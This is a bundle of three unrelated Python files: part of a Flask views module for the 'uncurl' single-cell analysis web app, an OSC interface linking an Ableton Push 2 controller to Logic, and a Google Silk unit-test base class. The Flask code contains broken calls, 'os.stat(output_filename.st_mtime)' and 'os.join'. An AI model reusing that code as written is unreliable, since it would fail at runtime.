username = request.form['username'].strip()[:25]
username = ''.join([c for c in username if c.isalnum() or (c in keep_chars)])
user_id = user_id + '-' + username
base_path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
os.makedirs(base_path)
# save request.form
with open(os.path.join(base_path, 'inputs.json'), 'w') as f:
f.write(json.dumps(request.form))
request_file = request.files
request_form = request.form
# use batch effect correction button
use_batch_correction = False
if 'use_batch_correction' in request.form:
use_batch_correction = request.form['use_batch_correction']
data_paths, gene_paths, output_filenames, init, shapes = load_upload_data(request_file, request_form, base_path)
P = Process(target=state_estimation_preproc, args=(user_id, base_path, data_paths, gene_paths, output_filenames, init,
shapes,
use_batch_correction))
P.start()
return redirect(url_for('views.state_estimation_result', user_id=user_id))
@views.route('/state_estimation/results/<user_id>/start', methods=['POST'])
def state_estimation_start(user_id):
"""
Actually start the process of state estimation.
This saves a file called 'params.json' in /tmp/uncurl/<user_id>
containing all parameters used in state estimation.
"""
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
gene_names_file = os.path.join(path, 'gene_names.txt')
if not os.path.exists(gene_names_file):
gene_names_file = None
# TODO: deal with init here - make note if it's qualitative or
# quantitative
# run qualNorm???
init_path= os.path.join(path, 'init.txt')
if not os.path.exists(init_path):
init_path = None
# load json params
with open(os.path.join(path, 'preprocess.json')) as f:
preprocess = json.load(f)
for key in request.form.keys():
preprocess[key] = request.form[key]
# params.json contains all input parameters to the state estimation, as well as all stats from preprocess.json.
with open(os.path.join(path, 'params.json'), 'w') as f:
json.dump(preprocess, f)
P = Process(target=state_estimation_thread, args=(user_id, gene_names_file, init_path, path, preprocess, current_app.config.copy()))
P.start()
return redirect(url_for('views.state_estimation_result', user_id=user_id))
@views.route('/state_estimation/results/<user_id>/')
def state_estimation_result(user_id):
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
if os.path.exists(os.path.join(path, 'sc_analysis.json')):
return redirect(url_for('interaction_views.view_plots', user_id=user_id))
elif os.path.exists(os.path.join(path, 'preprocess.json')):
uncurl_is_running = os.path.exists(os.path.join(path, 'submitted'))
current_task = 'None'
time_remaining = 'Unknown'
with open(os.path.join(path, 'preprocess.json')) as f:
preprocess = json.load(f)
try:
with open(os.path.join(path, 'read_count_hist_data.json')) as f:
read_count_hist_data = f.read()
with open(os.path.join(path, 'gene_count_hist_data.json')) as f:
gene_count_hist_data = f.read()
with open(os.path.join(path, 'gene_mean_hist_data.json')) as f:
gene_mean_hist_data = f.read()
except:
summary = Summary(None, None, base_path=path)
read_count_hist_data, gene_count_hist_data, gene_mean_hist_data = summary.generate_plotly_jsons()
if uncurl_is_running:
# get running time information (highly approximate)
current_task, time_remaining = get_progress(path)
# update with actual input parameters
with open(os.path.join(path, 'params.json')) as f:
preprocess.update(json.load(f))
uncurl_has_error = False
if time_remaining == 'error':
# TODO: if there is an error here...
uncurl_has_error = True
return render_template('state_estimation_user.html',
user_id=user_id, has_preview=True,
uncurl_is_done=False,
uncurl_is_running=uncurl_is_running,
uncurl_has_error=uncurl_has_error,
read_count_hist_data=read_count_hist_data,
gene_count_hist_data=gene_count_hist_data,
gene_mean_hist_data=gene_mean_hist_data,
current_task=current_task,
time_remaining=time_remaining,
**preprocess)
elif os.path.exists(os.path.join(path, 'error.txt')):
error_txt = ''
with open(os.path.join(path, 'error.txt')) as f:
error_txt = f.read()
return error(error_txt, 404)
else:
return render_template('state_estimation_user.html',
user_id=user_id, uncurl_is_running=False,
uncurl_is_done=False,
has_result=False)
# this gzips the directory and returns a download
@views.route('/<x>/results/<user_id>/download_all')
def state_estimation_download_all(x, user_id):
if x!='test':
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
if not os.path.exists(path):
path = os.path.join(current_app.config['SECONDARY_USER_DATA_DIR'], user_id)
if not os.path.exists(path):
return error('Data not found', 404)
else:
path = os.path.join(current_app.config['TEST_DATA_DIR'], user_id)
filename = user_id + '.tar.gz'
output_filename = os.path.join(current_app.config['USER_DATA_DIR'], filename)
create_tar = True
# update tarball if path is newer than output_filename
if os.path.exists(output_filename):
tar_mtime = os.stat(output_filename.st_mtime)
create_tar = False
for base, dirs, files in os.walk(path):
for f in files:
if os.stat(os.path.join(base, f)).st_mtime > tar_mtime:
create_tar = True
break
if create_tar:
import subprocess
subprocess.call(['tar', '-czf', output_filename, path])
print('download_all', path, filename)
return send_from_directory(current_app.config['USER_DATA_DIR'], filename)
@views.route('/<x>/results/<user_id>/<filename>')
def state_estimation_file(x, user_id, filename):
if x != 'test':
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
else:
path = os.path.join(current_app.config['TEST_DATA_DIR'], user_id)
print('download: ', path)
return send_from_directory(path, filename)
@views.route('/<x>/results/<user_id>/data_download')
def data_download(x, user_id):
if x!='test':
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
else:
path = os.path.join(current_app.config['TEST_DATA_DIR'], user_id)
files = os.listdir(path)
files.sort()
return render_template('data_download.html',
user_id=user_id,
test_or_user=x,
files=files)
def state_estimation_preproc(user_id, base_path, data_paths, gene_paths, output_filenames,
init=None,
shapes=['gene_cell'],
use_batch_correction=False):
# TODO: update for multiple data/genes
"""
Preprocessing for state estimation - generates summary statistics,
etc...
"""
# TODO: combine datasets
if base_path is None:
base_path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
try:
summary = Summary(data_paths, gene_paths, base_path, shapes=shapes, dataset_names=output_filenames, use_batch_correction=use_batch_correction)
read_count_hist_data, gene_count_hist_data, gene_mean_hist_data = summary.load_plotly_json()
summary.preprocessing_params()
except:
import traceback
text = traceback.format_exc()
with open(os.path.join(base_path, 'error.txt'), 'w') as f:
f.write(text)
def state_estimation_preproc_simple(user_id, base_path, data_path):
"""
Preprocessing, assuming that the data has already been merged.
"""
# TODO: combine datasets
if base_path is None:
base_path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
try:
summary = Summary(None, None, base_path)
read_count_hist_data, gene_count_hist_data, gene_mean_hist_data = summary.load_plotly_json()
summary.preprocessing_params()
except:
import traceback
text = traceback.format_exc()
with open(os.path.join(base_path, 'error.txt'), 'w') as f:
f.write(text)
def state_estimation_thread(user_id, gene_names=None, init_path=None, path=None, preprocess=None, config=None):
"""
Uses a new process to do state estimation. Assumes that the input data is already saved in a directory named /tmp/uncurl/<user_id>/.
Args:
user_id (str)
gene_names (str or array, optional): path to a list of gene names, or an array of gene names. Default: None
init_path (str, optional): path to txt matrix of shape (genes, k). Default: None.
path (str, optional): Path where data and results are saved.
preprocess (dict): dict containing additional parameters: min_reads, max_reads, normalize, is_sparse, is_gz, disttype, genes_frac, cell_frac, vismethod, baseline_vismethod
config (dict): current_app.config
"""
if path is None:
path = os.path.join(config['USER_DATA_DIR'], user_id)
# get correct data names
data = os.path.join(path, 'data.mtx')
if preprocess['is_gz']:
data += '.gz'
if not os.path.exists(data):
data = os.path.join(path, 'data.txt')
if preprocess['is_gz']:
data += '.gz'
# TODO: it's really confusing where the param names come from in
# the preprocess dict - they come from the input names in
# state_estimation_user.html.
dist_type = preprocess['disttype']
if dist_type=='Poisson':
pass
elif dist_type=='Negative binomial':
dist_type = 'nb'
elif dist_type == 'Log-Normal':
dist_type = 'lognorm'
uncurl_args = config['UNCURL_ARGS']
if dist_type != 'Poisson':
uncurl_args = config['NMF_ARGS']
if dist_type == 'Poisson':
uncurl_args['write_progress_file'] = os.path.join(path, 'progress.txt')
uncurl_args['dist'] = dist_type
# TODO: deal with init
if init_path is not None:
pass
# params.json is saved in path, so it does not need to be passed.
generate_uncurl_analysis(data, path,
**uncurl_args)
@views.route('/qual2quant')
def qual2quant():
return render_template('qual2quant.html')
@views.route('/qual2quant/input')
def qual2quant_input():
if 'fileinput' not in request.files or 'qualinput' not in request.files:
return error('Missing data input', 400)
cell_file = request.files['fileinput']
qual_file = request.files['qualinput']
cell_data = np.loadtxt(cell_file)
qual_data = np.loadtxt(qual_file)
user_id = str(uuid.uuid4())
P = Process(target=qual2quant_thread, args=(cell_data, qual_data, user_id))
P.start()
return redirect(url_for('qual2quant_result', user_id=user_id))
def qual2quant_thread(data, qual, user_id):
centers = uncurl.qualNorm(data, qual)
path = os.path.join(current_app.config['USER_DATA_DIR'], user_id)
with open(os.join(path, 'qual2quant_centers.txt'), 'w') as f:
np.savetxt(f, centers)
@views.route('/qual2quant/results/<user_id>')
def qual2quant_result(user_id):
if os.path.exists(os.path.join(current_app.config['USER_DATA_DIR'], user_id, 'qual2quant_centers.txt')):
return render_template('qual2quant_user.html',
user_id=user_id, has_result=True,
visualization=None)
else:
return render_template('qual2quant_user.html',
user_id=user_id, has_result=False)
def error(msg, code):
return render_template('error.html', msg=msg), code
|
logic_interface.py
|
from oscpy.client import OSCClient
from oscpy.server import OSCThreadServer
import definitions
import threading
import asyncio
import time
import push2_python
osc_send_host = "127.0.0.1"
osc_send_port = 8000
osc_receive_port = 9004
tracks_state_fps = 4.0
transport_state_fps = 10.0
bpm_button_names = [
push2_python.constants.BUTTON_UPPER_ROW_1,
push2_python.constants.BUTTON_UPPER_ROW_2,
push2_python.constants.BUTTON_UPPER_ROW_3,
push2_python.constants.BUTTON_UPPER_ROW_4,
push2_python.constants.BUTTON_UPPER_ROW_5,
push2_python.constants.BUTTON_UPPER_ROW_6,
push2_python.constants.BUTTON_UPPER_ROW_7,
push2_python.constants.BUTTON_UPPER_ROW_8
]
def to_utf8(utf8):
return utf8.decode("utf-8")
class LogicInterface(definitions.LogicMode):
app = None
count = 0
osc_sender = None
osc_server = None
state_transport_check_thread = None
state_tracks_check_thread = None
last_received_tracks_raw_state = ""
parsed_state = {}
def __init__(self, app):
self.app = app
self.osc_sender = OSCClient(osc_send_host, osc_send_port, encoding='utf8')
self.osc_server = OSCThreadServer()
sock = self.osc_server.listen(address='0.0.0.0', port=osc_receive_port, default=True)
self.osc_server.bind(b'/stateFromLogic/play', self.update_play_button)
self.osc_server.bind(b'/stateFromLogic/click', self.update_metronome_button)
self.osc_server.bind(b'/stateFromLogic/beats', self.bpm_lights)
self.osc_server.bind(b'/stateFromLogic/record', self.update_record_button)
# self.run_get_state_transport_thread()
# self.run_get_state_tracks_thread()
def run_get_state_transport_thread(self):
self.state_transport_check_thread = threading.Thread(target=self.check_transport_state)
self.state_transport_check_thread.start()
def run_get_state_tracks_thread(self):
self.state_tracks_check_thread = threading.Thread(target=self.check_tracks_state)
self.state_tracks_check_thread.start()
def check_transport_state(self):
while True:
time.sleep(1.0 / transport_state_fps)
self.osc_sender.send_message('/state/transport', [])
def check_tracks_state(self):
while True:
time.sleep(1.0 / tracks_state_fps)
self.osc_sender.send_message('/state/tracks', [])
def update_play_button(self, value):
definitions.isPlaying = True if value == 1.0 else False
self.app.logic_interface.get_buttons_state()
def update_metronome_button(self, value):
definitions.isMetronome = True if value == 1.0 else False
self.app.logic_interface.get_buttons_state()
def update_record_button(self, value):
definitions.isRecording = True if value == 1.0 else False
self.app.logic_interface.get_buttons_state()
def automate(self):
self.osc_sender.send_message('/push2/automate', [])
def repeat(self):
self.osc_sender.send_message('/push2/repeat', [])
def layout(self):
self.osc_sender.send_message('/push2/layout', [])
def session(self):
self.osc_sender.send_message('/push2/session', [])
def add_track(self):
self.osc_sender.send_message('/push2/add_track', [])
def device(self):
self.osc_sender.send_message('/push2/device', [])
def mix(self):
self.osc_sender.send_message('/push2/mix', [])
def browse(self):
self.osc_sender.send_message('/push2/browse', [])
def clip(self):
self.osc_sender.send_message('/push2/clip', [])
def fixed_length(self):
self.osc_sender.send_message('/push2/fixed_length', [])
def new(self):
self.osc_sender.send_message('/push2/new', [])
def new_next(self):
self.osc_sender.send_message('/push2/new_next', [])
def duplicate(self):
self.osc_sender.send_message('/push2/duplicate', [])
def quantize(self, index, quantize, shift, loop, repeat, off):
if index == '1/32t':
if quantize:
self.osc_sender.send_message('/push2/quantize/1_32T_quantize', [])
elif shift:
self.osc_sender.send_message('/push2/quantize/1_32T_shift', [])
elif repeat:
self.osc_sender.send_message('/push2/quantize/1_32T', [])
elif loop:
self.osc_sender.send_message('/push2/quantize/1_32T_loop', [])
elif off:
self.osc_sender.send_message('/push2/quantize/1_32T_off', [])
elif index == '1/32':
if quantize:
self.osc_sender.send_message('/push2/quantize/1_32_quantize', [])
elif shift:
self.osc_sender.send_message('/push2/quantize/1_32_shift', [])
elif repeat:
self.osc_sender.send_message('/push2/quantize/1_32', [])
elif loop:
self.osc_sender.send_message('/push2/quantize/1_32_loop', [])
elif off:
self.osc_sender.send_message('/push2/quantize/1_32_off', [])
elif index == '1/16t':
if quantize:
self.osc_sender.send_message('/push2/quantize/1_16T_quantize', [])
elif shift:
self.osc_sender.send_message('/push2/quantize/1_16T_shift', [])
elif repeat:
self.osc_sender.send_message('/push2/quantize/1_16T', [])
elif loop:
self.osc_sender.send_message('/push2/quantize/1_16T_loop', [])
elif off:
self.osc_sender.send_message('/push2/quantize/1_16T_off', [])
elif index == '1/16':
if quantize:
self.osc_sender.send_message('/push2/quantize/1_16_quantize', [])
elif shift:
self.osc_sender.send_message('/push2/quantize/1_16_shift', [])
elif repeat:
self.osc_sender.send_message('/push2/quantize/1_16', [])
elif loop:
self.osc_sender.send_message('/push2/quantize/1_16_loop', [])
elif off:
self.osc_sender.send_message('/push2/quantize/1_16_off', [])
elif index == '1/8t':
if quantize:
self.osc_sender.send_message('/push2/quantize/1_8T_quantize', [])
elif shift:
self.osc_sender.send_message('/push2/quantize/1_8T_shift', [])
elif repeat:
self.osc_sender.send_message('/push2/quantize/1_8T', [])
elif loop:
self.osc_sender.send_message('/push2/quantize/1_8T_loop', [])
elif off:
self.osc_sender.send_message('/push2/quantize/1_8T_off', [])
elif index == '1/8':
if quantize:
self.osc_sender.send_message('/push2/quantize/1_8_quantize', [])
elif shift:
self.osc_sender.send_message('/push2/quantize/1_8_shift', [])
elif repeat:
self.osc_sender.send_message('/push2/quantize/1_8', [])
elif loop:
self.osc_sender.send_message('/push2/quantize/1_8_loop', [])
elif off:
self.osc_sender.send_message('/push2/quantize/1_8_off', [])
elif index == '1/4t':
if quantize:
self.osc_sender.send_message('/push2/quantize/1_4T_quantize', [])
elif shift:
self.osc_sender.send_message('/push2/quantize/1_4T_shift', [])
elif repeat:
self.osc_sender.send_message('/push2/quantize/1_4T', [])
elif loop:
self.osc_sender.send_message('/push2/quantize/1_4T_loop', [])
elif off:
self.osc_sender.send_message('/push2/quantize/1_4T_off', [])
elif index == '1/4':
if quantize:
self.osc_sender.send_message('/push2/quantize/1_4_quantize', [])
elif shift:
self.osc_sender.send_message('/push2/quantize/1_4_shift', [])
elif repeat:
self.osc_sender.send_message('/push2/quantize/1_4', [])
elif loop:
self.osc_sender.send_message('/push2/quantize/1_4_loop', [])
elif off:
self.osc_sender.send_message('/push2/quantize/1_4_off', [])
def double_loop(self):
self.osc_sender.send_message('/push2/double_loop', [])
def double(self):
self.osc_sender.send_message('/push2/double', [])
def convert(self):
self.osc_sender.send_message('/push2/convert', [])
def stop_clip(self):
self.osc_sender.send_message('/push2/stop_clip', [])
def mute(self):
self.osc_sender.send_message('/push2/mute', [])
def mute_off(self):
self.osc_sender.send_message('/push2/mute_off', [])
def solo(self):
self.osc_sender.send_message('/push2/solo', [])
def solo_lock(self):
self.osc_sender.send_message('/push2/solo_lock', [])
def undo(self):
self.osc_sender.send_message('/push2/undo', [])
def repeat_off(self):
self.osc_sender.send_message('/push2/repeat_off', [])
def redo(self):
self.osc_sender.send_message('/push2/redo', [])
def delete(self):
self.osc_sender.send_message('/push2/delete', [])
def pause(self):
self.osc_sender.send_message('/logic/transport/pause', [1.00])
def play(self):
if definitions.isPlaying:
self.osc_sender.send_message('/logic/transport/stop', [1.00])
else:
self.osc_sender.send_message('/logic/transport/play', [1.00])
def record(self):
self.osc_sender.send_message('/logic/transport/record', [1.00])
def arrow_keys(self, direction, shift, loop):
if direction == 'up':
if shift:
self.osc_sender.send_message('/push2/up_shift', [])
elif loop:
self.osc_sender.send_message('/push2/up_loop', [])
else:
self.osc_sender.send_message('/push2/up', [])
if direction == 'down':
if shift:
self.osc_sender.send_message('/push2/down_shift', [])
elif loop:
self.osc_sender.send_message('/push2/down_loop', [])
else:
self.osc_sender.send_message('/push2/down', [])
if direction == 'left':
if shift:
self.osc_sender.send_message('/push2/left_shift', [])
elif loop:
self.osc_sender.send_message('/push2/left_loop', [])
else:
self.osc_sender.send_message('/push2/left', [])
if direction == 'right':
if shift:
self.osc_sender.send_message('/push2/right_shift', [])
elif loop:
self.osc_sender.send_message('/push2/right_loop', [])
else:
self.osc_sender.send_message('/push2/right', [])
def metronome_on_off(self):
self.osc_sender.send_message('/logic/transport/click', [1.00])
def get_buttons_state(self):
if definitions.isPlaying:
is_playing = True
else:
is_playing = False
if definitions.isMetronome:
metronome_on = True
else:
metronome_on = False
if definitions.isRecording:
is_recording = True
else:
is_recording = False
self.push.buttons.set_button_color(push2_python.constants.BUTTON_PLAY,
definitions.LIME if not is_playing else definitions.GREEN)
self.push.buttons.set_button_color(push2_python.constants.BUTTON_RECORD,
definitions.GREEN if not is_recording else definitions.RED)
self.push.buttons.set_button_color(push2_python.constants.BUTTON_METRONOME,
definitions.OFF_BTN_COLOR if not metronome_on else definitions.WHITE)
self.app.midi_cc_mode.update_buttons()
return is_playing, metronome_on, is_recording
def get_bpm(self):
return self.parsed_state.get('bpm', 120)
def set_bpm(self, bpm):
self.osc_sender.send_message('/transport/setBpm', [float(bpm)])
def bpm_lights(self, value):
beat = to_utf8(value)
beats = beat.split()
if int(float(beats[1])) % 2:
self.push.buttons.set_button_color(push2_python.constants.BUTTON_PLAY, definitions.GREEN)
for button_name in bpm_button_names:
self.set_button_color_if_expression(button_name, definitions.isRecording, definitions.RED,
definitions.GREEN)
else:
for button_name in bpm_button_names:
self.push.buttons.set_button_color(button_name, definitions.BLACK)
self.push.buttons.set_button_color(push2_python.constants.BUTTON_PLAY, definitions.GREEN_DARK)
if definitions.isRecording:
if int(float(beats[1])) % 4:
self.push.buttons.set_button_color(push2_python.constants.BUTTON_RECORD, definitions.RED)
else:
self.push.buttons.set_button_color(push2_python.constants.BUTTON_RECORD, definitions.RED_DARK)
return True
|
testcase.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import queue
import threading
import tracemalloc
import unittest
from typing import List, Tuple
from silk.tools.otns_manager import OtnsManager
from silk.unit_tests.mock_service import MockGrpcClient, MockUDPServer
LOG_LINE_FORMAT = "[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s"
class SilkTestCase(unittest.TestCase):
"""Silk unit test base case.
"""
@classmethod
def setUpClass(cls) -> None:
tracemalloc.start()
logging.basicConfig(level=logging.DEBUG, format=LOG_LINE_FORMAT)
cls.logger = logging.Logger(cls.__name__)
class SilkMockingTestCase(SilkTestCase):
"""Silk test case with basic mocked OTNS and manager set up.
"""
def setUp(self):
"""Test method set up.
"""
self.exception_queue = queue.Queue()
self.manager = OtnsManager("localhost", self.logger.getChild("OtnsManager"))
self.grpc_client = MockGrpcClient(self.exception_queue, self.logger.getChild("MockGrpcClient"))
self.manager.grpc_client = self.grpc_client
self.udp_server = MockUDPServer(self.exception_queue)
def tearDown(self):
"""Test method tear down. Clean up fixtures.
"""
self.manager.unsubscribe_from_all_nodes()
self.manager.remove_all_nodes()
self.udp_server.close()
def wait_for_expect(self, expect_thread: threading.Thread):
"""Wait for expectation to be fulfilled.
Args:
expect_thread (threading.Thread): thread running expectation.
"""
while True:
try:
exception = self.exception_queue.get(block=False)
except queue.Empty:
pass
else:
self.fail(exception)
if expect_thread.is_alive():
expect_thread.join(0.1)
else:
break
def expect_grpc_commands(self, commands: List[str]) -> threading.Thread:
"""Create a thread for an expecting gRPC commands.
Args:
commands (List[str]): expecting gRPC commands.
Returns:
threading.Thread: thread running the expectation.
"""
expect_thread = threading.Thread(target=self.grpc_client.expect_commands, args=(commands,))
expect_thread.start()
return expect_thread
def expect_udp_messages(self, messages: List[Tuple[str, int]]) -> threading.Thread:
"""Create a thread for an expecting UDP message.
Args:
messages (List[Tuple[str, int]]): list of expected UDP messages and corresponding source ID.
Returns:
threading.Thread: thread running the expectation.
"""
# convert source IDs to source ports
messages = [(message, 9000 + source_id) for message, source_id in messages]
expect_thread = threading.Thread(target=self.udp_server.expect_messages, args=(messages,))
expect_thread.start()
return expect_thread
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.